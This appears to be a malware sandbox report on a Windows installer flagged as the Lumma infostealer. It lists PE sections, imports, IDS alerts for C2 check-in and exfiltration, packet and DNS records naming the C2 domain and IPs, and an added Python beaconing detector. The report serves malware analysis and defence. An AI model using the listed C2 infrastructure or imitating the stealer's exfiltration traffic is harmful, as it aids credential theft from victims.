IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x100000 | 0x2e0de | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0xe2a95f | 0x2ef8 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x86000 | 0x994 | .ndata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x9000 | 0x2d0 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x728c | 0x7400 | 419d4e1be1ac35a5db9c47f553b27cea | False | 0.6566540948275862 | data | 6.499708590628113 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x9000 | 0x2b6e | 0x2c00 | cca1ca3fbf99570f6de9b43ce767f368 | False | 0.3678977272727273 | data | 4.497932535153822 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xc000 | 0x72b9c | 0x200 | 77f0839f8ebea31040e462523e1c770e | False | 0.279296875 | data | 1.8049406284608531 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata | 0x7f000 | 0x81000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x100000 | 0x2e0de | 0x2e200 | ce5bbc296f77bb94a8c8f9aca1e2922b | False | 0.2826632367886179 | data | 5.3217470933306865 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x12f000 | 0xfd6 | 0x1000 | 98b5852fe7cbf1ae227944ba00d536ab | False | 0.567626953125 | data | 5.312168663390484 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x10042c | 0x1f50 | PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced | English | United States | 1.0013722554890219
RT_ICON | 0x10237c | 0x2668 | Device independent bitmap graphic, 48 x 96 x 32, image size 9792 | English | United States | 0.4860659072416599
RT_ICON | 0x1049e4 | 0x1128 | Device independent bitmap graphic, 32 x 64 x 32, image size 4352 | English | United States | 0.5398451730418944
RT_ICON | 0x105b0c | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.650709219858156
RT_ICON | 0x105f74 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 67584 | | | 0.15040518159233407
RT_ICON | 0x11679c | 0x94a8 | Device independent bitmap graphic, 96 x 192 x 32, image size 38016 | | | 0.24603216312802187
RT_ICON | 0x11fc44 | 0x5488 | Device independent bitmap graphic, 72 x 144 x 32, image size 21600 | | | 0.2909426987060998
RT_ICON | 0x1250cc | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16896 | | | 0.25301133679735477
RT_ICON | 0x1292f4 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | | | 0.3447095435684647
RT_ICON | 0x12b89c | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | | | 0.38907129455909945
RT_ICON | 0x12c944 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | | | 0.4959016393442623
RT_ICON | 0x12d2cc | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | | | 0.5558510638297872
RT_DIALOG | 0x12d734 | 0x100 | data | English | United States | 0.5234375
RT_DIALOG | 0x12d834 | 0x11c | data | English | United States | 0.6056338028169014
RT_DIALOG | 0x12d950 | 0x60 | data | English | United States | 0.7291666666666666
RT_GROUP_ICON | 0x12d9b0 | 0x76 | data | | | 0.7627118644067796
RT_GROUP_ICON | 0x12da28 | 0x3e | data | English | United States | 0.8225806451612904
RT_VERSION | 0x12da68 | 0x3a0 | data | English | United States | 0.4105603448275862
RT_MANIFEST | 0x12de08 | 0x2d6 | XML 1.0 document, ASCII text, with very long lines (726), with no line terminators | English | United States | 0.5647382920110193

DLL | Import
KERNEL32.dll | SetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
USER32.dll | GetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW
GDI32.dll | SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
SHELL32.dll | SHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
ADVAPI32.dll | RegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
COMCTL32.dll | ImageList_AddMasked, ImageList_Destroy, ImageList_Create
ole32.dll | CoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
VERSION.dll | GetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW

Language of compilation system | Country where language is spoken | Map
English | United States |

Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-28T21:35:56.856378+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49784 | 172.67.213.115 | 443 | TCP
2024-12-28T21:35:57.889164+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.5 | 49784 | 172.67.213.115 | 443 | TCP
2024-12-28T21:35:57.889164+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.5 | 49784 | 172.67.213.115 | 443 | TCP
2024-12-28T21:35:59.109107+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49790 | 172.67.213.115 | 443 | TCP
2024-12-28T21:35:59.860017+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.5 | 49790 | 172.67.213.115 | 443 | TCP
2024-12-28T21:35:59.860017+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.5 | 49790 | 172.67.213.115 | 443 | TCP
2024-12-28T21:36:01.379888+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49797 | 172.67.213.115 | 443 | TCP
2024-12-28T21:36:03.672548+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49803 | 172.67.213.115 | 443 | TCP
2024-12-28T21:36:04.494462+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.5 | 49803 | 172.67.213.115 | 443 | TCP
2024-12-28T21:36:05.830553+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49809 | 172.67.213.115 | 443 | TCP
2024-12-28T21:36:08.201372+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49815 | 172.67.213.115 | 443 | TCP
2024-12-28T21:36:10.507535+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49821 | 172.67.213.115 | 443 | TCP
2024-12-28T21:36:13.624453+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49831 | 172.67.213.115 | 443 | TCP
2024-12-28T21:36:14.406950+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.5 | 49831 | 172.67.213.115 | 443 | TCP
2024-12-28T21:36:15.857196+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49836 | 172.67.75.40 | 443 | TCP

Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                            Dec 28, 2024 21:36:03.673944950 CET49803443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:36:03.673958063 CET44349803172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:36:03.674186945 CET44349803172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:36:03.677562952 CET49803443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:36:03.677763939 CET49803443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:36:03.677798986 CET44349803172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:36:03.677853107 CET49803443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:36:03.723345995 CET44349803172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:36:04.494476080 CET44349803172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:36:04.494545937 CET44349803172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:36:04.494621038 CET49803443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:36:04.494842052 CET49803443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:36:04.494863987 CET44349803172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:36:04.572468996 CET49809443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:36:04.572494984 CET44349809172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:36:04.572578907 CET49809443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:36:04.572877884 CET49809443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:36:04.572891951 CET44349809172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:36:05.830362082 CET44349809172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:36:05.830553055 CET49809443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:36:05.831829071 CET49809443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:36:05.831835032 CET44349809172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:36:05.832026005 CET44349809172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:36:05.833442926 CET49809443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:36:05.833570957 CET49809443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:36:05.833595991 CET44349809172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:36:05.833678007 CET49809443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:36:05.833684921 CET44349809172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:36:06.812208891 CET44349809172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:36:06.812299013 CET44349809172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:36:06.812366009 CET49809443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:36:06.812540054 CET49809443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:36:06.812552929 CET44349809172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:36:06.894860983 CET49815443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:36:06.894931078 CET44349815172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:36:06.895097971 CET49815443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:36:06.895368099 CET49815443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:36:06.895385981 CET44349815172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:36:08.201273918 CET44349815172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:36:08.201371908 CET49815443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:36:08.204981089 CET49815443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:36:08.205002069 CET44349815172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:36:08.205421925 CET44349815172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:36:08.206691027 CET49815443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:36:08.206790924 CET49815443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:36:08.206799030 CET44349815172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:36:08.966052055 CET44349815172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:36:08.966140032 CET44349815172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:36:08.966192007 CET49815443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:36:08.966329098 CET49815443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:36:08.966346979 CET44349815172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:36:09.243052959 CET49821443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:36:09.243088007 CET44349821172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:36:09.243159056 CET49821443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:36:09.243419886 CET49821443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:36:09.243432999 CET44349821172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:36:10.507436991 CET44349821172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:36:10.507534981 CET49821443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:36:10.531601906 CET49821443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:36:10.531619072 CET44349821172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:36:10.531810045 CET44349821172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:36:10.533833981 CET49821443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:36:10.534444094 CET49821443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:36:10.534478903 CET44349821172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:36:10.534568071 CET49821443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:36:10.534609079 CET44349821172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:36:10.534707069 CET49821443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:36:10.534734011 CET44349821172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:36:10.534832001 CET49821443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:36:10.534858942 CET44349821172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:36:10.534974098 CET49821443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:36:10.535002947 CET44349821172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:36:10.535134077 CET49821443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:36:10.535166025 CET49821443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:36:10.575345993 CET44349821172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:36:10.575539112 CET49821443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:36:10.575571060 CET49821443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:36:10.623343945 CET44349821172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:36:10.623528004 CET49821443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:36:10.623573065 CET49821443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:36:10.623589993 CET49821443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:36:10.667383909 CET44349821172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:36:10.667551041 CET49821443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:36:10.667593002 CET49821443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:36:10.715368032 CET44349821172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:36:10.715509892 CET49821443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:36:10.763336897 CET44349821172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:36:10.774358034 CET44349821172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:36:10.774492979 CET49821443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:36:10.774561882 CET44349821172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:36:10.987425089 CET44349821172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:36:12.409279108 CET44349821172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:36:12.409362078 CET44349821172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:36:12.409452915 CET49821443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:36:12.409672976 CET49821443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:36:12.409689903 CET44349821172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:36:12.412817001 CET49831443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:36:12.412862062 CET44349831172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:36:12.412936926 CET49831443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:36:12.413228035 CET49831443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:36:12.413238049 CET44349831172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:36:13.624362946 CET44349831172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:36:13.624453068 CET49831443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:36:13.625614882 CET49831443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:36:13.625619888 CET44349831172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:36:13.625822067 CET44349831172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:36:13.626933098 CET49831443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:36:13.626967907 CET49831443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:36:13.626992941 CET44349831172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:36:14.406955957 CET44349831172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:36:14.407023907 CET44349831172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:36:14.407254934 CET49831443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:36:14.407329082 CET49831443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:36:14.407345057 CET44349831172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:36:14.407356024 CET49831443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:36:14.407360077 CET44349831172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:36:14.549663067 CET49836443192.168.2.5172.67.75.40
                                                            Dec 28, 2024 21:36:14.549700975 CET44349836172.67.75.40192.168.2.5
                                                            Dec 28, 2024 21:36:14.549801111 CET49836443192.168.2.5172.67.75.40
                                                            Dec 28, 2024 21:36:14.550246954 CET49836443192.168.2.5172.67.75.40
                                                            Dec 28, 2024 21:36:14.550261021 CET44349836172.67.75.40192.168.2.5
                                                            Dec 28, 2024 21:36:15.857098103 CET44349836172.67.75.40192.168.2.5
                                                            Dec 28, 2024 21:36:15.857196093 CET49836443192.168.2.5172.67.75.40
                                                            Dec 28, 2024 21:36:15.858777046 CET49836443192.168.2.5172.67.75.40
                                                            Dec 28, 2024 21:36:15.858784914 CET44349836172.67.75.40192.168.2.5
                                                            Dec 28, 2024 21:36:15.858984947 CET44349836172.67.75.40192.168.2.5
                                                            Dec 28, 2024 21:36:15.860179901 CET49836443192.168.2.5172.67.75.40
                                                            Dec 28, 2024 21:36:15.903327942 CET44349836172.67.75.40192.168.2.5
                                                            Dec 28, 2024 21:36:16.662843943 CET44349836172.67.75.40192.168.2.5
                                                            Dec 28, 2024 21:36:16.662880898 CET44349836172.67.75.40192.168.2.5
                                                            Dec 28, 2024 21:36:16.662905931 CET44349836172.67.75.40192.168.2.5
                                                            Dec 28, 2024 21:36:16.662929058 CET44349836172.67.75.40192.168.2.5
                                                            Dec 28, 2024 21:36:16.662944078 CET49836443192.168.2.5172.67.75.40
                                                            Dec 28, 2024 21:36:16.662964106 CET44349836172.67.75.40192.168.2.5
                                                            Dec 28, 2024 21:36:16.662975073 CET49836443192.168.2.5172.67.75.40
                                                            Dec 28, 2024 21:36:16.663021088 CET44349836172.67.75.40192.168.2.5
                                                            Dec 28, 2024 21:36:16.663067102 CET49836443192.168.2.5172.67.75.40
                                                            Dec 28, 2024 21:36:16.663377047 CET49836443192.168.2.5172.67.75.40
                                                            Dec 28, 2024 21:36:16.663387060 CET44349836172.67.75.40192.168.2.5
                                                            Dec 28, 2024 21:36:16.663394928 CET49836443192.168.2.5172.67.75.40
                                                            Dec 28, 2024 21:36:16.663398981 CET44349836172.67.75.40192.168.2.5
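The packet list above shows the dropped process opening a fresh TLS connection to 172.67.213.115 every two to three seconds (client ports 49797, 49803, 49809, 49815, 49821, 49831 in turn), which is exactly the timing shape that beacon-hunting heuristics over flow records look for. The following is an added example and not part of the Joe Sandbox report: it parses packet rows in the layout of the table, takes the earliest packet seen per client ephemeral port as the connection start, and flags destination hosts whose inter-connection gaps have a low coefficient of variation. The sample rows are constructed from the table (only the first packet of each connection plus one server-side packet, which the parser must skip); the thresholds `max_cv=0.3` and `min_connections=4` are assumptions. Note the caveat: here the regularity comes from back-to-back request/response rounds rather than a sleep timer, so a score like this is a triage signal to pair with the HTTP content, not proof of C2 on its own.

```python
import re
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Constructed sample (added example, not report data verbatim): the first packet
# of each client-initiated connection in the table above, plus one server->client
# packet that must be ignored. Feeding every packet of a capture works the same,
# because connection_starts() keeps only the earliest timestamp per 4-tuple.
SAMPLE_PACKETS = """\
Dec 28, 2024 21:36:00.120758057 CET 49797 443 192.168.2.5 172.67.213.115
Dec 28, 2024 21:36:00.120785952 CET 443 49797 172.67.213.115 192.168.2.5
Dec 28, 2024 21:36:02.459619045 CET 49803 443 192.168.2.5 172.67.213.115
Dec 28, 2024 21:36:04.572468996 CET 49809 443 192.168.2.5 172.67.213.115
Dec 28, 2024 21:36:06.894860983 CET 49815 443 192.168.2.5 172.67.213.115
Dec 28, 2024 21:36:09.243052959 CET 49821 443 192.168.2.5 172.67.213.115
Dec 28, 2024 21:36:12.412817001 CET 49831 443 192.168.2.5 172.67.213.115
Dec 28, 2024 21:36:14.549663067 CET 49836 443 192.168.2.5 172.67.75.40
"""

# Timestamp, timezone token, source port, dest port, source IP, dest IP.
LINE_RE = re.compile(
    r"^(?P<ts>\w{3} \d{1,2}, \d{4} \d{2}:\d{2}:\d{2}\.\d+) \w+ "
    r"(?P<sport>\d+) (?P<dport>\d+) (?P<sip>[\d.]+) (?P<dip>[\d.]+)$"
)


def parse_ts(ts):
    # The sandbox prints nanoseconds; datetime only carries microseconds,
    # so truncate the fraction to six digits before parsing.
    head, frac = ts.rsplit(".", 1)
    return datetime.strptime(f"{head}.{frac[:6]}", "%b %d, %Y %H:%M:%S.%f")


def connection_starts(text, ephemeral_min=1024):
    """Return {dest_ip: sorted list of connection start times}.

    A connection is keyed by (client IP, client port, server IP); the earliest
    packet for that key is its start. Packets whose source port is below the
    ephemeral range are server->client replies and are skipped.
    """
    starts = defaultdict(dict)
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        sport = int(m["sport"])
        if sport < ephemeral_min:
            continue
        key = (m["sip"], sport, m["dip"])
        t = parse_ts(m["ts"])
        per_dest = starts[m["dip"]]
        if key not in per_dest or t < per_dest[key]:
            per_dest[key] = t
    return {ip: sorted(d.values()) for ip, d in starts.items()}


def beacon_score(times):
    """Inter-arrival statistics for one destination, or None if too few."""
    if len(times) < 3:
        return None
    gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
    mu = mean(gaps)
    # Coefficient of variation: low values mean evenly spaced connections.
    return {"connections": len(times), "mean_gap": mu, "cv": pstdev(gaps) / mu}


def flag_periodic(text, max_cv=0.3, min_connections=4):
    """Destinations contacted repeatedly with low-jitter spacing (assumed thresholds)."""
    flagged = {}
    for ip, times in connection_starts(text).items():
        s = beacon_score(times)
        if s and s["connections"] >= min_connections and s["cv"] <= max_cv:
            flagged[ip] = s
    return flagged


if __name__ == "__main__":
    for ip, s in flag_periodic(SAMPLE_PACKETS).items():
        print(f"{ip}: {s['connections']} connections, "
              f"mean gap {s['mean_gap']:.2f}s, cv {s['cv']:.2f}")
```

On the sample rows only 172.67.213.115 is flagged (six connections, mean gap about 2.46 s, cv about 0.15); 172.67.75.40 is seen once and gets no score. On real flow logs, swap `SAMPLE_PACKETS` for the exported packet or Zeek `conn.log` rows and raise `min_connections`, since four connections is far too few for production use.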
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 28, 2024 21:35:06.913566113 CET | 62475 | 53 | 192.168.2.5 | 1.1.1.1
Dec 28, 2024 21:35:07.052226067 CET | 53 | 62475 | 1.1.1.1 | 192.168.2.5
Dec 28, 2024 21:35:55.362039089 CET | 55895 | 53 | 192.168.2.5 | 1.1.1.1
Dec 28, 2024 21:35:55.499284029 CET | 53 | 55895 | 1.1.1.1 | 192.168.2.5
Dec 28, 2024 21:36:14.410732031 CET | 65332 | 53 | 192.168.2.5 | 1.1.1.1
Dec 28, 2024 21:36:14.548464060 CET | 53 | 65332 | 1.1.1.1 | 192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 28, 2024 21:35:06.913566113 CET | 192.168.2.5 | 1.1.1.1 | 0x442f | Standard query (0) | xhWaXURTqNAudpSlyMZZXaDi.xhWaXURTqNAudpSlyMZZXaDi | A (IP address) | IN (0x0001) | false
Dec 28, 2024 21:35:55.362039089 CET | 192.168.2.5 | 1.1.1.1 | 0x6a2d | Standard query (0) | fallyjustif.click | A (IP address) | IN (0x0001) | false
Dec 28, 2024 21:36:14.410732031 CET | 192.168.2.5 | 1.1.1.1 | 0x9ebc | Standard query (0) | rentry.co | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 28, 2024 21:35:07.052226067 CET | 1.1.1.1 | 192.168.2.5 | 0x442f | Name error (3) | xhWaXURTqNAudpSlyMZZXaDi.xhWaXURTqNAudpSlyMZZXaDi | none | none | A (IP address) | IN (0x0001) | false
Dec 28, 2024 21:35:55.499284029 CET | 1.1.1.1 | 192.168.2.5 | 0x6a2d | No error (0) | fallyjustif.click | | 172.67.213.115 | A (IP address) | IN (0x0001) | false
Dec 28, 2024 21:35:55.499284029 CET | 1.1.1.1 | 192.168.2.5 | 0x6a2d | No error (0) | fallyjustif.click | | 104.21.37.209 | A (IP address) | IN (0x0001) | false
Dec 28, 2024 21:36:14.548464060 CET | 1.1.1.1 | 192.168.2.5 | 0x9ebc | No error (0) | rentry.co | | 172.67.75.40 | A (IP address) | IN (0x0001) | false
Dec 28, 2024 21:36:14.548464060 CET | 1.1.1.1 | 192.168.2.5 | 0x9ebc | No error (0) | rentry.co | | 104.26.2.16 | A (IP address) | IN (0x0001) | false
